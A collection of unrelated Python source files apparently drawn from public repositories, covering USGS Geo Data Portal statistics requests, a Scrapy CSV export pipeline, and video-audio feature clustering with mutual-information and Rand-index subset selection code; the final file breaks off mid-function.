#### File: pyGDP/pygdp/fwgs.py
```python
from pygdp import _execute_request
from pygdp import _get_geotype
from owslib.util import log
def submitFeatureWeightedGridStatistics(geoType, dataSetURI, varID, startTime, endTime, attribute, value, gmlIDs,
verbose, coverage, delim, stat, grpby, timeStep, summAttr, weighted, WFS_URL, outputfname, sleepSecs):
"""
Makes a featureWeightedGridStatistics algorithm call.
The web service interface implemented is summarized here:
https://my.usgs.gov/confluence/display/GeoDataPortal/Generating+Area+Weighted+Statistics+Of+A+Gridded+Dataset+For+A+Set+Of+Vector+Polygon+Features
Note that varID and stat can be a list of strings.
"""
# test for dods:
dataSetURI = _execute_request.dodsReplace(dataSetURI)
log.info('Generating feature collection.')
featureCollection = _get_geotype._getFeatureCollectionGeoType(geoType, attribute, value, gmlIDs, WFS_URL)
if featureCollection is None:
return
processid = 'gov.usgs.cida.gdp.wps.algorithm.FeatureWeightedGridStatisticsAlgorithm'
if weighted==False:
processid = 'gov.usgs.cida.gdp.wps.algorithm.FeatureGridStatisticsAlgorithm'
solo_inputs = [("FEATURE_ATTRIBUTE_NAME",attribute),
("DATASET_URI", dataSetURI),
("TIME_START",startTime),
("TIME_END",endTime),
("REQUIRE_FULL_COVERAGE",str(coverage).lower()),
("DELIMITER",delim),
("GROUP_BY", grpby),
("SUMMARIZE_TIMESTEP", str(timeStep).lower()),
("SUMMARIZE_FEATURE_ATTRIBUTE",str(summAttr).lower()),
("FEATURE_COLLECTION", featureCollection)]
if isinstance(stat, list):
num_stats=len(stat)
if num_stats > 7:
raise Exception('Too many statistics were submitted.')
else:
num_stats=1
if isinstance(varID, list):
num_varIDs=len(varID)
else:
num_varIDs=1
inputs = [('','')]*(len(solo_inputs)+num_varIDs+num_stats)
count=0
rmvCnt=0
for solo_input in solo_inputs:
if solo_input[1]!=None:
inputs[count] = solo_input
count+=1
else:
rmvCnt+=1
del inputs[count:count+rmvCnt]
if num_stats > 1:
for stat_in in stat:
if stat_in not in ["MEAN", "MINIMUM", "MAXIMUM", "VARIANCE", "STD_DEV", "SUM", "COUNT"]:
raise Exception('The statistic %s is not in the allowed list: "MEAN", "MINIMUM", "MAXIMUM", "VARIANCE", "STD_DEV", "SUM", "COUNT"' % stat_in)
inputs[count] = ("STATISTICS",stat_in)
count+=1
elif num_stats == 1:
if stat not in ["MEAN", "MINIMUM", "MAXIMUM", "VARIANCE", "STD_DEV", "SUM", "COUNT"]:
raise Exception('The statistic %s is not in the allowed list: "MEAN", "MINIMUM", "MAXIMUM", "VARIANCE", "STD_DEV", "SUM", "COUNT"' % stat)
inputs[count] = ("STATISTICS",stat)
count+=1
if num_varIDs > 1:
for var in varID:
inputs[count] = ("DATASET_ID",var)
count+=1
elif num_varIDs == 1:
inputs[count] = ("DATASET_ID",varID)
output = "OUTPUT"
return _execute_request._executeRequest(processid, inputs, output, verbose, outputfname, sleepSecs)
```
#### File: pyGDP/pygdp/_webdata_xml_generate.py
```python
from owslib.wps import WebProcessingService
from StringIO import StringIO
from owslib.etree import etree
from GDP_XML_Generator import gdpXMLGenerator
from pygdp import _execute_request
import sys
from pygdp.namespaces import WPS_Service
def _generateRequest(dataSetURI, algorithm, method, varID, verbose):
"""
Takes a dataset uri, algorithm, method, and datatype. This function will generate a simple XML document
to make the request specified. (Only works for ListOpendapGrids and GetGridTimeRange).
Will return a list containing the info requested for (either data types or time range).
"""
POST = WebProcessingService(WPS_Service, verbose=verbose)
xmlGen = gdpXMLGenerator()
root = xmlGen.getXMLRequestTree(dataSetURI, algorithm, method, varID, verbose)
request = etree.tostring(root)
execution = POST.execute(None, [], request=request)
_execute_request._check_for_execution_errors(execution)
if method == 'getDataSetTime':
seekterm = '{xsd/gdptime-1.0.xsd}time'
elif method == 'getDataType':
seekterm = '{xsd/gdpdatatypecollection-1.0.xsd}name'
elif method == 'getDataLongName':
seekterm = '{xsd/gdpdatatypecollection-1.0.xsd}description'
elif method == 'getDataUnits':
seekterm = '{xsd/gdpdatatypecollection-1.0.xsd}unitsstring'
return _parseXMLNodesForTagText(execution.response, seekterm)
def _parseXMLNodesForTagText(xml, tag):
"""
Parses through a XML tree for text associated with specified tag.
Returns a list of the text.
"""
tag_text = []
for node in xml.iter():
if node.tag == tag:
tag_text.append(node.text)
return tag_text
``` |
{
"source": "Jiwan88/Web-Scraping",
"score": 2
} |
#### File: University Data/UniversityScraper/pipelines.py
```python
from scrapy.exporters import CsvItemExporter
from scrapy import signals
class UniversityscraperPipeline(object):
def __init__(self):
self.files = {}
@classmethod
def from_crawler(cls, crawler):
pipeline = cls()
crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)
crawler.signals.connect(pipeline.spider_closed, signals.spider_closed)
return pipeline
def spider_opened(self, spider):
output_file = open(str(spider.name)+'.csv', 'a+b')
self.files[spider] = output_file
self.exporter = CsvItemExporter(output_file)
self.exporter.fields_to_export = ['course_name','category','sub_category','course_website','duration','duration_term','study_mode','degree_level','monthly_intake','intake_day','intake_month','apply_day','apply_month','city','domestic_only','international_fee','domestic_fee','fee_term','fee_year','currency','study_load','language','ielts_listening','ielts_speaking','ielts_writing','ielts_reading','ielts_overall','pte_listening','pte_speaking','pte_writing','pte_reading','pte_overall','toefl_listening','toefl_speaking','toefl_writing','toefl_reading','toefl_overall','english_test','reading','listening','speaking','writing','overall','academic_level','academic_score','score_type','academic_country','other_test','score','other_requirements','course_description','course_structure','career','scholarship']
self.exporter.start_exporting()
def spider_closed(self, spider):
self.exporter.finish_exporting()
output_file = self.files.pop(spider)
output_file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return item
``` |
{
"source": "JiwanChung/acav100m",
"score": 2
} |
#### File: code/data/clustering.py
```python
import pickle
import warnings
import random
from pathlib import Path
import torch
import webdataset as wds
from torch.utils.data import IterableDataset, DataLoader
from utils import identity, get_num_workers, to_str, load_pickle
from mps import distributed as du
from .shuffle import shuffle
from .pipeline import pipeline
from .shards import get_shards_size, get_shards_path
def get_clustering_dataloader(args, drop_last=False, shuffle=False, is_train=True):
# is_train: True when training centroids, False when assigning cluster labels
dataset, num_workers = get_dataset(args, is_train=is_train)
if isinstance(args.computation.num_gpus, int):
world_size = min(du.get_world_size(), args.computation.num_gpus)
else:
world_size = du.get_world_size()
batch_size = int(args.data.batch_size / world_size)
dataloader = DataLoader(
dataset, batch_size,
shuffle=False, # shuffling in dataloader is meaningless for webdataset
num_workers=num_workers,
collate_fn=collate_features,
drop_last=drop_last)
return dataloader
def get_dataset(args, is_train=True):
shards_path, rest = get_shards_path(args, suffix='.pkl', f=get_shards_size, is_train=is_train)
data = FeatureDataset(args, shards_path, rest['all_shards_path'], is_train=is_train)
if isinstance(args.computation.num_gpus, int):
world_size = min(du.get_world_size(), args.computation.num_gpus)
else:
world_size = du.get_world_size()
batch_size = int(args.data.batch_size / world_size)
num_workers = data.num_workers
effective_num_workers = 1 if num_workers == 0 else num_workers
shards_size_dt = rest['shards_size_dt']
shards_size = [shards_size_dt[Path(p).stem] for p in rest['all_shards_path']]
length = du.get_length(
shards_size, batch_size, num_workers, is_train=is_train,
)
print("(node {}) dataset size: {}".format(
du.get_rank(),
sum(du.node_selection(
shards_size, du.get_rank(),
total=world_size, is_train=is_train, no_str_ok=True))))
if du.get_rank() == 0:
print("dataset length: {}".format(length))
nominal = length * effective_num_workers
data = wds.ResizedDataset(
data,
length,
nominal,
)
return data, num_workers
def get_layer(array, layer):
if isinstance(array, dict):
return array[layer]
elif isinstance(array, list):
i = int(layer.split('_')[-1])
return array[i]
raise ValueError('feature array is not a dict nor a list!')
def collate_features(batch):
feature_names = ['video_features', 'audio_features']
pivot = batch[0]
res = {}
for key in pivot.keys():
if key in feature_names:
for i, _ in enumerate(pivot[key]):
if isinstance(pivot[key][i], dict): # layer extractor
pivot_array = pivot[key][i]['array']
feature = {}
if isinstance(pivot_array, dict):
layer_keys = list(pivot_array.keys())
elif isinstance(pivot_array, list):
layer_keys = [f'layer_{i}' for i in range(len(pivot_array))]
else:
raise ValueError('feature array is not a dict nor a list!')
for layer in layer_keys:
layer_feature = []
for row in batch:
try:
layer_feature.append(torch.from_numpy(get_layer(row[key][i]['array'], layer)))
except Exception as e:
print(f"{row['shard_name']} shard error: {e}")
raise Exception
layer_feature = torch.stack(layer_feature, dim=0)
feature[layer] = layer_feature
else:
feature = [torch.from_numpy(row[key][i]['array']) for row in batch]
feature = torch.stack(feature, dim=0)
model_key = (pivot[key][i]['extractor_name'], pivot[key][i]['dataset'])
model_key = '/'.join(model_key)
res[model_key] = feature
else:
res[key] = [row[key] for row in batch]
res['idx'] = [Path(row['filename']).stem for row in batch]
return res
class FeatureDataset(IterableDataset):
def __init__(self, args, shards_path, all_shards_path,
node_selection=identity, shard_shuffle=identity, is_train=True):
# is_train: True when training centroids, False when assigning cluster labels
# We need the list of paths to all input shards
# (after discarding if args.computation.discard_shards is set)
# Here, I'll refer to it as `all_shards_path`
self.shards_path = shards_path
self.all_shards_path = all_shards_path
if is_train:
if isinstance(args.computation.num_gpus, int):
world_size = min(du.get_world_size(), args.computation.num_gpus)
else:
world_size = du.get_world_size()
num_shards = [
len(du.node_selection(all_shards_path, i, total=world_size, is_train=is_train))
for i in range(world_size)
]
self.num_workers = min(
[args.computation.num_workers] + num_shards
)
else:
# Here, self.shards_path is the list of paths to shards allocated to current node (gpu)
# (after discarding if args.computation.discard_shards is set)
self.num_workers, _ = get_num_workers(
args.computation.num_workers, len(self.shards_path),
)
out_str = "#Workers of Feature Extraction Dataset"
out_str += f" (train={is_train}, node={du.get_rank()})"
out_str += f": {self.num_workers}"
print(out_str)
self.node_selection = node_selection
self.shard_shuffle = shard_shuffle
self.pipeline = []
def shard_fn(self):
urls = self.shards_path
urls = self.node_selection(urls)
urls = worker_urls(urls)
urls = self.shard_shuffle(urls)
return urls
def samples(self, urls):
if isinstance(urls, str):
urls = [urls]
assert isinstance(urls, list)
source = self.raw_samples(urls)
return pipeline(source, *self.pipeline)
def raw_samples(self, urls):
for url in urls:
url = Path(url)
try:
try:
pkl = load_pickle(url)
except EOFError as e:
print(e)
print('EOFError in shard loading: {}'.format(Path(url.stem)))
continue
for feature in pkl:
yield feature
except Exception as e:
print(e)
print('Exception in shard loading: {}'.format(Path(url.stem)))
continue
def __iter__(self):
urls = self.shard_fn()
return self.samples(urls)
def shuffle(self, size, rng=None, **kw):
"""Shuffle the data."""
if size == 0:
return self
if rng is None:
rng = random.Random()
self.rng = rng
self.shard_shuffle = Shuffler(rng)
self.pipeline.append(shuffle(size, rng=rng, **kw))
return self
class Shuffler:
"""Make a shuffle function (avoid nesting for pickle)."""
def __init__(self, rng):
self.rng = rng
def __call__(self, lst):
lst = list(lst)
self.rng.shuffle(lst)
return lst
def worker_urls(urls):
"""Selects a subset of urls based on Torch get_worker_info.
Used as a shard selection function in Dataset."""
import torch
assert isinstance(urls, list)
assert isinstance(urls[0], str)
worker_info = torch.utils.data.get_worker_info()
if worker_info is not None:
wid = worker_info.id
num_workers = worker_info.num_workers
if wid == 0 and len(urls) < num_workers:
warnings.warn("num_workers {} > num_shards {}".format(num_workers, len(urls)))
return urls[wid::num_workers]
else:
return urls
```
#### File: code/models/__init__.py
```python
import os
import inspect
from pathlib import Path
import torch
from torch import nn
from inflection import underscore
# models should be initialized before loading data
model_dict = {}
def add_models():
path = Path(os.path.dirname(__file__))
for p in path.glob('*.py'):
name = p.stem
parent = p.parent.stem
if name != "__init__":
__import__(f"{parent}.{name}")
module = eval(name)
for member in dir(module):
# Add to dict all nn.Module classes
member = getattr(module, member)
if hasattr(member, '__mro__') and \
nn.Module in inspect.getmro(member):
model_dict[underscore(str(member.__name__))] = member
def get_model_dict():
if not model_dict:
add_models()
return model_dict
def get_model_class(model_name, args):
if not model_dict:
add_models()
model_class = model_dict[model_name]
if hasattr(model_class, 'args'):
args = merge_args(args, model_class.args)
return model_class, args
def init_model(model_name, args):
model_class, args = get_model_class(model_name, args)
return model_class(args), args
def merge_args(args, model_args):
for k, v in model_args.items():
if k not in args:
args[k] = model_args[k]
return args
def get_model(model_name, args):
model, args = init_model(model_name, args)
model = model.to(args.computation.device)
if args.computation.num_gpus > 1:
cur_device = torch.cuda.current_device()
model = torch.nn.parallel.DistributedDataParallel(
module=model, device_ids=[cur_device], output_device=cur_device
)
return model, args
def download_model_weights(args):
model_names = sorted(args.models)
for model_name in model_names:
model_class, args = get_model_class(model_name, args)
if hasattr(model_class, 'download'):
model_class.download(args)
```
#### File: clustering/code/process_batch.py
```python
import numpy as np
from utils import to_device, dol_to_lod
def _train_batch(args, features, clusterings):
if isinstance(features, list):
features = {'layer_{}'.format(i): feature for i, feature in enumerate(features)}
if isinstance(features, dict):
# layer extractor
distance = [clustering.add(features[key].to(args.computation.device)) \
for key, clustering in clusterings.items()]
distance = np.array(distance).mean()
else:
distance = clusterings['model'].add(features.to(args.computation.device))
return distance
def train_batch(args, model, batch, options, clusterings):
batch = to_device(batch, args.computation.device)
data = batch['data']
# batch processing
features = model(data) # BC
distance = _train_batch(args, features, clusterings)
return distance
def train_batch_cached(args, batch, clusterings):
batch = to_device(batch, args.computation.device)
features = batch
distance = _train_batch(args, features, clusterings)
return distance
def _extract_batch(args, batch, features, clusterings):
if isinstance(features, list):
features = {'layer_{}'.format(i): feature for i, feature in enumerate(features)}
if isinstance(features, dict):
# layer extractor
features = {key: clustering.calc_best(features[key].to(args.computation.device))[0] \
for key, clustering in clusterings.items()}
features = {key: list(feature.detach().cpu().numpy()) for key, feature in features.items()}
features = dol_to_lod(features)
else:
features = clusterings['model'].calc_best(features.to(args.computation.device))[0]
features = list(features.detach().cpu().numpy())
features = [{'assignments': f} for f in features]
meta_keys = ['filename', 'shard_name', 'shard_size', 'idx']
metas = {k: batch[k] for k in meta_keys if k in batch}
metas = dol_to_lod(metas)
features = [{**meta, **feature} for meta, feature in zip(metas, features)]
return features
def extract_batch(args, model, batch, options, clusterings):
batch = to_device(batch, args.computation.device)
data = batch['data']
# batch processing
features = model(data) # BC
return _extract_batch(args, batch, features, clusterings)
def extract_batch_cached(args, meta, batch, clusterings):
batch = to_device(batch, args.computation.device)
return _extract_batch(args, meta, batch, clusterings)
```
#### File: code/measures/dataloaders.py
```python
import math
import random
import copy
from itertools import chain
import torch
from utils import peek
def get_penultimates(keys):
penultimates = {}
for key in keys:
view = key[:key.find('_')] # get dataset+model name
layer_name = key[key.find('_') + 1:]
if view not in penultimates:
penultimates[view] = view + '_' + layer_name
elif layer_name > penultimates[view]:
penultimates[view] = view + '_' + layer_name
keys = sorted(list(penultimates.keys()))
return [penultimates[k] for k in keys]
class ClassDataLoader:
def __init__(self, data):
dataset, labels, num_iters = self.shuffle_dataset(data)
self.dataset = dataset
self.labels = labels
self.num_iters = num_iters
def shuffle_dataset(self, data):
dataset = {}
lengths = {}
for label, class_data in data.items():
class_data = copy.deepcopy(class_data)
random.shuffle(class_data)
lengths[label] = len(class_data)
dataset[label] = class_data
max_len = max(lengths.values())
self.batch_size = self.num_classes = len(data)
# num_iters = math.ceil(max_len / batch_size)
num_iters = max_len
labels = sorted(list(data.keys()))
return dataset, labels, num_iters
def gather_batch(self, i):
batch = [self.get_index(self.dataset[label], i) for label in self.labels]
return batch
def __iter__(self):
for i in range(self.num_iters):
batch = self.gather_batch(i)
batch = [self.format_row(row) for row in batch]
batch = zip(*batch) # zip by feature type
batch = [torch.stack(v, dim=0) for v in batch]
yield batch
def __len__(self):
return self.num_iters
def get_index(self, cset, i):
remainder = i % len(cset)
return cset[remainder]
def format_row(self, row):
penultimates = get_penultimates(list(row['features'].keys()))
return [row['features'][k] for k in penultimates]
class SampleDataLoader(ClassDataLoader):
def __init__(self, data, batch_size):
dataset = self.shuffle_dataset(data)
self.dataset = dataset
self.batch_size = batch_size
self.num_iters = math.ceil(len(self.dataset) / self.batch_size)
def shuffle_dataset(self, data):
data = list(chain(*data.values())) # ignore classes
random.shuffle(data)
return data
def gather_batch(self, i):
start = self.batch_size * i
end = self.batch_size * (i + 1)
batch = self.dataset[start: end]
return batch
class InferDataLoader(SampleDataLoader):
def __init__(self, data, batch_size):
self.dataset = self.get_dataset(data)
self.batch_size = batch_size
self.num_iters = math.ceil(len(self.dataset) / self.batch_size)
def get_dataset(self, data):
penultimates = get_penultimates(list(data.keys()))
dataset = []
for i in range(len(peek(data))):
features = {k: data[k][i] for k in penultimates}
row = {'features': features}
dataset.append(row)
return dataset
```
#### File: code/measures/efficient_pair.py
```python
import torch
from .efficient import EfficientMI
'''
pair-based scores
- Fowlkes–Mallows index
- Rand index
'''
def tensor_calc_combination(t, n=2):
device = t.device
dtype = t.dtype
t = t.cpu().numpy()
from scipy.special import comb
t = comb(t, n, exact=False)
return torch.from_numpy(t).round().to(dtype).to(device)
class FowlkesMallowsScore(EfficientMI):
def init_cache(self):
super().init_cache()
self.pair_stats = ['TP', 'FP', 'FN', 'TN']
P = len(self.combinations)
self.cache = {**self.cache, **{name: torch.full(tuple([P]), self.eps) for name in self.pair_stats}}
def add_samples(self, ids):
super().add_samples(ids) # W x P x C x C
self.init_pair_stats()
def init_pair_stats(self):
N = self.cache['N'] # P x C x C
a = self.cache['a'] # P x C
b = self.cache['b'] # P x C
n = self.cache['n'] # P
S_ab = tensor_calc_combination(N, 2).sum(dim=[-1, -2]) # P
S_a = tensor_calc_combination(a, 2).sum(dim=-1) # P
S_b = tensor_calc_combination(b, 2).sum(dim=-1) # P
n = tensor_calc_combination(n, 2) # P
res = self._calc_pair_stats(S_ab, S_a, S_b, n)
for key in res.keys():
self.cache[key] = res[key]
def get_last(self):
last = {key: self.cache[key].unsqueeze(0) * self.candidates[key]
for key in self.candidates.keys()}
return last
def calc_pair_stats(self, last):
N = last['N'] # W x P x C x C
a = last['a'] # W x P x C
b = last['b'] # W x P x C
n = last['n'] # W x P
S_ab = N.sum(dim=[-1, -2]) # W x P
S_a = a.sum(dim=-1)
S_b = b.sum(dim=-1)
return self._calc_pair_stats(S_ab, S_a, S_b, n)
def _calc_pair_stats(self, S_ab, S_a, S_b, n):
S_aub = S_a + S_b - S_ab
res = {
'TP': S_ab,
'FP': S_a - S_ab,
'FN': S_b - S_ab,
'TN': n - S_aub
}
return res
def update_cache(self, last, idx):
for key in self.candidates.keys():
self.cache[key] += self.candidates[key][idx]
for key in self.temp_pair_stats.keys():
self.cache[key] += self.temp_pair_stats[key][idx]
del self.temp_pair_stats
self.pair_stats_sanity_check()
def pair_stats_sanity_check(self):
left_hand = sum([self.cache[key] for key in self.pair_stats]) # P
n = self.cache['n'] # P
right_hand = (n * (n - 1)) / 2 # P
assert (left_hand == right_hand).all(), "pair stats count error"
def _calc_score(self, *args, **kwargs):
return self.calc_pair_score(*args, **kwargs)
def calc_pair_score(self, last):
pair_stats = self.calc_pair_stats(last)
# W x P
self.temp_pair_stats = pair_stats
c = {p: self.cache[p].unsqueeze(0) + v for p, v in pair_stats.items()}
return self._calc_pair_score(c)
def _calc_pair_score(self, c):
return self.calc_FM(c)
def calc_FM(self, c):
FM = ((c['TP'] / (c['TP'] + c['FP'])) * (c['TP'] / (c['TP'] + c['FN']))).sqrt()
return FM
class RandScore(FowlkesMallowsScore):
def _calc_pair_score(self, c):
return self.calc_Rand(c)
def calc_Rand(self, c):
rand = (c['TP'] + c['TN']) / (c['TP'] + c['FP'] + c['FN'] + c['TN'])
return rand
class AdjustedRandScore(EfficientMI):
# TODO
def _calc_score(self, *args, **kwargs):
return self.calc_ARand(*args, **kwargs)
def calc_ARand(self, last):
N = last['N'] # W x P x C x C
a = last['a'] # W x P x C
b = last['b']
n = last['n'] # W x P
Nc = tensor_calc_combination(N, 2).sum(dim=[-1, -2])
ac = tensor_calc_combination(a, 2).sum(dim=-1)
bc = tensor_calc_combination(b, 2).sum(dim=-1)
nc = tensor_calc_combination(n, 2)
chance_term = (ac * bc) / nc
numerator = Nc - chance_term
denominator = 1 / 2 * (ac + bc) - chance_term
return numerator / denominator
```
#### File: code/measures/efficient.py
```python
import copy
import time
from typing import List
from tqdm import tqdm
import torch
import numpy as np
from clustering import Clustering
# W: num_candidates, P: num_clustering_pairs, C: num_centroids
# N: (P x C X C), a: (P x C), b: (P x C), n: (P)
# WN: (W x P x C X C), Wa: (W x P x C), Wb: (W x P x C), wn: (W x P)
class EfficientMI:
""" this implementation requires the users to use the same ncentroids for all clusterings """
def __init__(self, clusterings: List[Clustering], measure_type='mutual_info',
average_method='arithmetic'):
self.average_method = average_method.lower()
self.clusterings = clusterings
self.ncentroids = clusterings[0].ncentroids
assignments = np.array([clustering.ind2cen for clustering in clusterings]) # D x V
self.assignments = torch.from_numpy(assignments).to(torch.long).t() # V x D
self.eps = np.finfo('float64').eps
def init(self, clustering_combinations, candidates):
if isinstance(clustering_combinations, dict):
self.combinations = clustering_combinations['pairing']
self.pair_weights = clustering_combinations['weights']
else:
self.combinations = clustering_combinations
self.init_cache()
self.init_candidates(candidates)
def get_N(self, assignments):
C = self.ncentroids
assignments = self.one_hot(assignments, C) # W x D x C
pair_ids = torch.LongTensor(self.combinations) # P x 2
assignments = assignments.to(self.device)
pair_ids = pair_ids.to(self.device)
p1 = self.gather_pairs(assignments, pair_ids[:, 0])
p2 = self.gather_pairs(assignments, pair_ids[:, 1]) # W x P x C
N = torch.einsum('wpa,wpb->wpab', p1, p2) # B x P x C x C
return N
def get_assignments(self, candidates):
candidates = torch.LongTensor(candidates) # W
assignments = self.assignments # V x D
assignments = assignments.index_select(dim=0, index=candidates)
return assignments
def init_cache(self):
P = len(self.combinations)
C = self.ncentroids
N = torch.full((P, C, C), self.eps)
a = N.sum(dim=1)
b = N.sum(dim=2)
n = a.sum(dim=-1)
self.cache = {'N': N, 'a': a, 'b': b, 'n': n}
def init_candidates(self, candidates):
self.candidate_ids = torch.LongTensor(candidates)
assignments = self.get_assignments(candidates)
N = self.get_N(assignments)
a = N.sum(2)
b = N.sum(3)
n = b.sum(-1)
self.candidates = {'N': N, 'a': a, 'b': b, 'n': n}
@staticmethod
def gather_pairs(assignments, idx):
W, _, C = assignments.shape
idx = idx.unsqueeze(0).unsqueeze(-1)
idx = idx.repeat(W, 1, C)
return assignments.gather(dim=1, index=idx) # W x P x C
@staticmethod
def one_hot(x, N, default=0, value=1):
dtype = torch.float
device = x.device
x_onehot = torch.full((*x.shape, N), default, dtype=dtype).to(device)
value = torch.full(x_onehot.shape, value, dtype=dtype).to(device)
x_onehot.scatter_(dim=-1, index=x.unsqueeze(-1), src=value)
return x_onehot
def calc_score(self, *args, **kwargs):
scores = self._calc_score(*args, **kwargs)
scores = scores.mean(dim=-1) # W
score, idx = scores.max(dim=0)
return score.item(), idx.item()
def _calc_score(self, *args, **kwargs):
scores = self.calc_MI(*args, **kwargs)
if hasattr(self, 'pair_weights'):
pair_weights = torch.tensor(self.pair_weights).float() # P
pair_weights = pair_weights.to(self.device)
scores = torch.einsum('wp,p->wp', scores, pair_weights)
return scores
def calc_MI(self, last):
N = last['N'] # W x P x C x C
a = last['a'].unsqueeze(2) # W x P x 1 x C
b = last['b'].unsqueeze(3)
n = last['n'].unsqueeze(-1).unsqueeze(-1)
scores = (N / n * (N.log() + n.log() - (a.log() + b.log()))).sum([2, 3]) # W x P
return scores
def get_last(self, candidates=None):
if candidates is None:
candidates = self.candidates
last = {key: self.cache[key].unsqueeze(0) + candidates[key]
for key in candidates.keys()}
return last
def update_cache(self, last, idx):
for key in last.keys():
self.cache[key] = last[key][idx]
def remove_idx_all(self, idx):
self.remove_idx('candidate_ids', idx)
self.remove_idx('candidates', idx)
def calc_measure(self, celf=False):
if celf:
return self.calc_measure_celf()
else:
return self.calc_measure_greedy()
def calc_measure_greedy(self):
last = self.get_last()
score, idx = self.calc_score(last)
candidate_idx = self.candidate_ids[idx].item()
self.update_cache(last, idx)
self.remove_idx_all(idx)
return score, candidate_idx, 1
def calc_measure_celf(self):
check, lookup = False, 0
if hasattr(self, 'candidate_ids'):
self.reverse_id_map = {v.item(): i for i, v in enumerate(list(self.candidate_ids))}
while not check:
lookup += 1
current = self.Q_idx[0]
current_gain, _ = self.calc_measure_single(current)
current_diff = current_gain - self.gain
self.Q_val[0] = current_diff
# Q = sorted(Q, key=lambda x: x[1], reverse=True)
self.Q_val, idx = self.Q_val.sort(descending=True)
self.Q_idx = self.Q_idx.index_select(dim=0, index=idx)
check = (self.Q_val[0] == current_diff) # tie
self.gain += self.Q_val[0]
s = self.Q_idx[0].item()
score = self.gain
self.Q_val = self.Q_val[1:]
self.Q_idx = self.Q_idx[1:]
reversed_id = self.reverse_id_map[s]
self.update_cache_celf(s)
self.remove_idx_all(reversed_id)
return score, s, lookup
def init_celf_q(self, prev_score):
self.Q_idx = copy.deepcopy(self.candidate_ids)
last = self.get_last()
scores = self._calc_score(last)
scores = scores.mean(dim=-1) # W
self.Q_val = scores
self.gain = prev_score
def calc_measure_single(self, current):
current = current.item()
if hasattr(self, 'reverse_id_map'):
idx = self.reverse_id_map[current]
else:
idx = current # alignment
candidate = {k: m[idx].unsqueeze(0) for k, m in self.candidates.items()}
last = self.get_last(candidate)
score, _ = self.calc_score(last)
return score, idx
def update_cache_celf(self, current):
if hasattr(self, 'reverse_id_map'):
idx = self.reverse_id_map[current]
else:
idx = current # alignment
candidate = {k: m[idx].unsqueeze(0) for k, m in self.candidates.items()}
last = self.get_last(candidate)
for key in last.keys():
self.cache[key] = last[key][0]
def remove_idx(self, name, idx):
if hasattr(self, name):
data = getattr(self, name)
if isinstance(data, dict):
data = {key: self._remove_idx(val, idx) for key, val in data.items()}
else:
data = self._remove_idx(data, idx)
setattr(self, name, data)
def _remove_idx(self, data, idx):
return torch.cat((data[:idx], data[idx + 1:]), dim=0)
def _add_samples(self, ids):
'''
assignments = torch.LongTensor([[c.get_assignment(x) for c in self.clusterings]
for x in ids]) # W x D
'''
C = self.clusterings[0].ncentroids
assignments = self.get_assignments(ids)
N_whole = self.get_N(assignments)
N = N_whole.sum(0) # P x C x C
a = N.sum(1) # P x C
b = N.sum(2)
n = b.sum(-1) # P
return {'N': N, 'a': a, 'b': b, 'n': n}
def add_samples(self, candidate_ids):
to_add = self._add_samples(candidate_ids)
for idx in candidate_ids:
self.remove_idx_all(idx)
for key in to_add.keys():
self.cache[key] += to_add[key]
'''
cand_ids = [self.candidates[idx] for idx in ids]
for idx in cand_ids:
# DEBUG: variable array length!
self.remove_idx_all(idx)
'''
def run_greedy(self, subset_size, start_indices, intermediate_target=None):
return self.run(subset_size, start_indices, intermediate_target, celf_ratio=0)
def run(self, subset_size, start_indices, intermediate_target=None, celf_ratio=0):
# celf_ratio = 0 -> full greedy
# greedy for the first (n_iters * (1 - celf_ratio)), celf for the rest
assert celf_ratio >= 0 and celf_ratio <= 1, 'invalid celf_ratio {}'.format(celf_ratio)
S = start_indices
GAIN = []
LOOKUPS = []
timelapse = []
self.add_samples(start_indices)
greedy_start_time = time.time()
start_time = time.time()
# start from empty index
iters = list(range(len(start_indices), subset_size - 1))
niters = len(iters)
greedy_niters = round(niters * (1 - celf_ratio))
greedy_iters = iters[:greedy_niters]
celf_iters = iters[greedy_niters:]
celf_niters = len(celf_iters)
print("niters: {} (greedy: {}, celf: {})".format(niters, greedy_niters,
celf_niters))
pbar = tqdm(greedy_iters, desc='greedy iter')
for j in pbar:
start_time = time.time()
score, idx, lookup = self.calc_measure(celf=False)
timelapse.append(time.time() - start_time)
S.append(idx)
GAIN.append(score)
LOOKUPS.append(lookup)
if intermediate_target is not None:
precision = len(set(intermediate_target) & set(S)) / len(set(S))
pbar.set_description("(LEN: {}, MEASURE: {}, PRECISION: {})".format(
len(S), score, precision))
else:
pbar.set_description("(LEN: {}, MEASURE: {})".format(len(S), score))
if len(celf_iters) > 0:
prev_score = GAIN[-1] if len(GAIN) > 0 else 0
self.init_celf_q(prev_score)
pbar = tqdm(celf_iters, desc='celf iter')
for j in pbar:
start_time = time.time()
score, idx, lookup = self.calc_measure(celf=True)
timelapse.append(time.time() - start_time)
S.append(idx)
GAIN.append(score)
LOOKUPS.append(lookup)
if intermediate_target is not None:
precision = len(set(intermediate_target) & set(S)) / len(set(S))
pbar.set_description("(LEN: {}, MEASURE: {}, PRECISION: {})".format(
len(S), score, precision))
else:
pbar.set_description("(LEN: {}, MEASURE: {})".format(len(S), score))
tqdm.write("Time Consumed: {} seconds".format(time.time() - greedy_start_time))
return (S, GAIN, timelapse, LOOKUPS)
def ensure_nonzero(self, x):
if torch.is_tensor(x):
x = torch.max(x, torch.full(x.shape, self.eps, dtype=x.dtype))
else:
x = max(x, self.eps)
return x
def generalized_mean(self, ha, hb):
if self.average_method == 'max':
normalizer = torch.max(ha, hb) # max avg
elif self.average_method == 'min':
normalizer = torch.min(ha, hb)
else:
# default is arithmetic
normalizer = (ha + hb) / 2 # arithmetic mean
return normalizer
class EfficientAMI(EfficientMI):
""" adjusted MI """
def _calc_score(self, *args, **kwargs):
return self.calc_AMI(*args, **kwargs)
def calc_EMI(self, last):
# maybe sklearn.metrics.cluster.expected_mutual_information?
# we need a way to 'DP' the factorials for faster computation
N = last['N'] # W x P x C x C
a = last['a'].unsqueeze(2) # W x P x 1 x C
b = last['b'].unsqueeze(3)
n = last['n'].unsqueeze(-1).unsqueeze(-1)
term1 = (N / n * (N.log() + n.log() - (a.log() + b.log())))
log_term2 = (a + 1).lgamma() + (b + 1).lgamma() + (n - a + 1).lgamma() + (n - b + 1).lgamma() \
- ((n + 1).lgamma() + (N + 1).lgamma() + (a - N + 1).lgamma() + (b - N + 1).lgamma()
+ (n - a - b + N + 1).lgamma())
scores = (term1 * log_term2.exp()).sum([2, 3])
return scores
@staticmethod
def calc_entropy(x, n):
p = x / n # W x P x C
return -(p * p.log()).sum(dim=-1)
def calc_entropies(self, last):
a = last['a'] # W x P x C
